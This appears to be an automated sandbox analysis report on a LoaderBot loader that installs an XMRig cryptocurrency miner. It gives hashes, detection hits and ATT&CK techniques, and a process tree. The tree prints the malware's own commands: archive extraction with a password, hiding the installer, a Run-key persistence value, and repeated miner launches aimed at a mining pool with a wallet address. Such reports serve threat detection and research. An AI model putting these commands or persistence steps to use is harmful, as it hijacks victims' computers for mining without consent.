loaderbot | 7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780

Analysis

max time kernel
150s
max time network
123s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
13-04-2024 01:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe
Size

4.2MB
MD5

b7250436469d05b646b54b00ccb74d7e
SHA1

7ad840124e69004c862d0cf3f722b00cbfbbb9d3
SHA256

7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780
SHA512

599e2a873b14b461c628ef3fb3f9771e11d866ff16012e82fbd614267e4eab268abd0671ad6bca6bcc8a5808e94b5aa1dcbb7ba75c51e78a645f040d60732ba4
SSDEEP

98304:tt5Uqm7J/F8CAXFSubtgfzlM87bnHzNLhs5rugOyMhKGiDy7:ttw7JrAVRclM87bnTNTgOywUy7

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables built or packed with MPress PE compressor 64 IoCs

resource	yara_rule
behavioral1/files/0x0007000000016cb6-42.dat	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2720-45-0x0000000000320000-0x000000000071E000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/files/0x0008000000016ca5-53.dat	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2720-54-0x0000000007040000-0x0000000007BB5000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2964-56-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2964-57-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2084-63-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2084-62-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2112-68-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2112-69-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1540-74-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/660-78-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/660-80-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2852-85-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2852-86-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1888-91-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2060-97-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2060-96-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1244-104-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2340-111-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2340-110-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1908-116-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/380-123-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/380-124-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2432-129-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2876-135-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2876-134-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2568-140-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2640-145-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2640-146-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/760-151-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/760-152-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1296-157-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1296-158-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2104-163-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2856-169-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2856-170-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1612-175-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1644-181-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1644-180-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1580-186-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1580-187-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2840-192-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2840-193-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2424-199-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2424-198-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1324-205-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2132-210-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2132-211-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1720-217-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1720-216-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2000-222-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2000-223-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1324-229-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1324-228-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1476-235-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2944-240-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1652-246-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1652-247-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2080-252-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/2080-254-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1448-258-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1448-261-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress
behavioral1/memory/1988-267-0x0000000140000000-0x0000000140B75000-memory.dmp	INDICATOR_EXE_Packed_MPress

LoaderBot executable 3 IoCs

resource	yara_rule
behavioral1/files/0x0007000000016cb6-42.dat	loaderbot
behavioral1/memory/2720-45-0x0000000000320000-0x000000000071E000-memory.dmp	loaderbot
behavioral1/memory/2720-54-0x0000000007040000-0x0000000007BB5000-memory.dmp	loaderbot

XMRig Miner payload 54 IoCs

miner

resource	yara_rule
behavioral1/memory/2964-56-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2964-57-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2084-63-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2112-68-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1540-74-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/660-80-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2852-86-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1888-91-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2060-96-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1244-104-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2340-111-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2340-110-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1908-116-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/380-123-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2432-129-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2876-135-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2568-140-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2640-145-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/760-152-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1296-158-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2104-163-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2856-169-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1612-175-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1644-181-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1644-180-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1580-187-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2840-192-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2424-199-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1324-205-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2132-211-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1720-216-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2000-223-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1324-229-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1324-228-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1476-235-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2944-240-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1652-246-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1652-247-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2080-254-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1448-261-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1988-267-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2820-272-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2820-274-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2168-280-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1508-287-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1820-299-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1452-311-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2624-318-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1684-334-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1644-349-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1948-354-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1720-360-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1264-366-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1604-376-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	Installer.exe

Executes dropped EXE 64 IoCs

pid	Process
2060	7z.exe
2700	7z.exe
2488	7z.exe
2720	Installer.exe
2964	Driver.exe
2084	Driver.exe
2112	Driver.exe
1540	Driver.exe
660	Driver.exe
2852	Driver.exe
1888	Driver.exe
2060	Driver.exe
1244	Driver.exe
2340	Driver.exe
1908	Driver.exe
380	Driver.exe
2432	Driver.exe
2876	Driver.exe
2568	Driver.exe
2640	Driver.exe
760	Driver.exe
1296	Driver.exe
2104	Driver.exe
2856	Driver.exe
1612	Driver.exe
1644	Driver.exe
1580	Driver.exe
2840	Driver.exe
2424	Driver.exe
1324	Driver.exe
2132	Driver.exe
1720	Driver.exe
2000	Driver.exe
1324	Driver.exe
1476	Driver.exe
2944	Driver.exe
1652	Driver.exe
2080	Driver.exe
1448	Driver.exe
1988	Driver.exe
2820	Driver.exe
2168	Driver.exe
1508	Driver.exe
1692	Driver.exe
1820	Driver.exe
2980	Driver.exe
1452	Driver.exe
2624	Driver.exe
1276	Driver.exe
1540	Driver.exe
1684	Driver.exe
2340	Driver.exe
2096	Driver.exe
1644	Driver.exe
1948	Driver.exe
1720	Driver.exe
1264	Driver.exe
2476	Driver.exe
1604	Driver.exe
1940	Driver.exe
284	Driver.exe
2612	Driver.exe
3040	Driver.exe
1920	Driver.exe

Loads dropped DLL 7 IoCs

pid	Process
2724	cmd.exe
2060	7z.exe
2724	cmd.exe
2700	7z.exe
2724	cmd.exe
2488	7z.exe
2720	Installer.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Installer.exe"	Installer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2720	Installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe
2720	Installer.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeRestorePrivilege	2060	7z.exe
Token: 35	2060	7z.exe
Token: SeSecurityPrivilege	2060	7z.exe
Token: SeSecurityPrivilege	2060	7z.exe
Token: SeRestorePrivilege	2700	7z.exe
Token: 35	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeSecurityPrivilege	2700	7z.exe
Token: SeRestorePrivilege	2488	7z.exe
Token: 35	2488	7z.exe
Token: SeSecurityPrivilege	2488	7z.exe
Token: SeSecurityPrivilege	2488	7z.exe
Token: SeDebugPrivilege	2720	Installer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1044 wrote to memory of 2724	1044	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 1044 wrote to memory of 2724	1044	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 1044 wrote to memory of 2724	1044	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 1044 wrote to memory of 2724	1044	7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe	28
PID 2724 wrote to memory of 2728	2724	cmd.exe	30
PID 2724 wrote to memory of 2728	2724	cmd.exe	30
PID 2724 wrote to memory of 2728	2724	cmd.exe	30
PID 2724 wrote to memory of 2060	2724	cmd.exe	31
PID 2724 wrote to memory of 2060	2724	cmd.exe	31
PID 2724 wrote to memory of 2060	2724	cmd.exe	31
PID 2724 wrote to memory of 2700	2724	cmd.exe	32
PID 2724 wrote to memory of 2700	2724	cmd.exe	32
PID 2724 wrote to memory of 2700	2724	cmd.exe	32
PID 2724 wrote to memory of 2488	2724	cmd.exe	33
PID 2724 wrote to memory of 2488	2724	cmd.exe	33
PID 2724 wrote to memory of 2488	2724	cmd.exe	33
PID 2724 wrote to memory of 2840	2724	cmd.exe	34
PID 2724 wrote to memory of 2840	2724	cmd.exe	34
PID 2724 wrote to memory of 2840	2724	cmd.exe	34
PID 2724 wrote to memory of 2720	2724	cmd.exe	35
PID 2724 wrote to memory of 2720	2724	cmd.exe	35
PID 2724 wrote to memory of 2720	2724	cmd.exe	35
PID 2724 wrote to memory of 2720	2724	cmd.exe	35
PID 2724 wrote to memory of 2720	2724	cmd.exe	35
PID 2724 wrote to memory of 2720	2724	cmd.exe	35
PID 2724 wrote to memory of 2720	2724	cmd.exe	35
PID 2720 wrote to memory of 2964	2720	Installer.exe	37
PID 2720 wrote to memory of 2964	2720	Installer.exe	37
PID 2720 wrote to memory of 2964	2720	Installer.exe	37
PID 2720 wrote to memory of 2964	2720	Installer.exe	37
PID 2720 wrote to memory of 2084	2720	Installer.exe	52
PID 2720 wrote to memory of 2084	2720	Installer.exe	52
PID 2720 wrote to memory of 2084	2720	Installer.exe	52
PID 2720 wrote to memory of 2084	2720	Installer.exe	52
PID 2720 wrote to memory of 2112	2720	Installer.exe	41
PID 2720 wrote to memory of 2112	2720	Installer.exe	41
PID 2720 wrote to memory of 2112	2720	Installer.exe	41
PID 2720 wrote to memory of 2112	2720	Installer.exe	41
PID 2720 wrote to memory of 1540	2720	Installer.exe	129
PID 2720 wrote to memory of 1540	2720	Installer.exe	129
PID 2720 wrote to memory of 1540	2720	Installer.exe	129
PID 2720 wrote to memory of 1540	2720	Installer.exe	129
PID 2720 wrote to memory of 660	2720	Installer.exe	45
PID 2720 wrote to memory of 660	2720	Installer.exe	45
PID 2720 wrote to memory of 660	2720	Installer.exe	45
PID 2720 wrote to memory of 660	2720	Installer.exe	45
PID 2720 wrote to memory of 2852	2720	Installer.exe	47
PID 2720 wrote to memory of 2852	2720	Installer.exe	47
PID 2720 wrote to memory of 2852	2720	Installer.exe	47
PID 2720 wrote to memory of 2852	2720	Installer.exe	47
PID 2720 wrote to memory of 1888	2720	Installer.exe	49
PID 2720 wrote to memory of 1888	2720	Installer.exe	49
PID 2720 wrote to memory of 1888	2720	Installer.exe	49
PID 2720 wrote to memory of 1888	2720	Installer.exe	49
PID 2720 wrote to memory of 2060	2720	Installer.exe	51
PID 2720 wrote to memory of 2060	2720	Installer.exe	51
PID 2720 wrote to memory of 2060	2720	Installer.exe	51
PID 2720 wrote to memory of 2060	2720	Installer.exe	51
PID 2720 wrote to memory of 1244	2720	Installer.exe	53
PID 2720 wrote to memory of 1244	2720	Installer.exe	53
PID 2720 wrote to memory of 1244	2720	Installer.exe	53
PID 2720 wrote to memory of 1244	2720	Installer.exe	53
PID 2720 wrote to memory of 2340	2720	Installer.exe	133
PID 2720 wrote to memory of 2340	2720	Installer.exe	133

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2840	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe
"C:\Users\Admin\AppData\Local\Temp\7fd525394f449871ea7be96a66ddc1ff6cb498aaaee85549cae392a782670780.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1044
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2724
- - C:\Windows\system32\mode.com
    mode 65,10
    3⤵
    PID:2728
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p12151210907486279731870130990 -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2060
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2700
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2488
- - C:\Windows\system32\attrib.exe
    attrib +H "Installer.exe"
    3⤵
    - Views/modifies file attributes
    PID:2840
- - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
    "Installer.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2964
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2084
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2112
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1540
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:660
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2852
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1888
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2060
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1244
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:2340
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:1908
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4AAVoaf13Do2Jqvf6MT9z7bF1AbfFL5i1b6pLTTWa8t4aj46CBnKFFtSR6xYN9xshV7aQJC51fLe3ErWugFWGZWMMe4j2Ea -p x -k -v=0 --donate-level=0 -t 4
      4⤵
      Executes dropped EXE
      PID:380
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
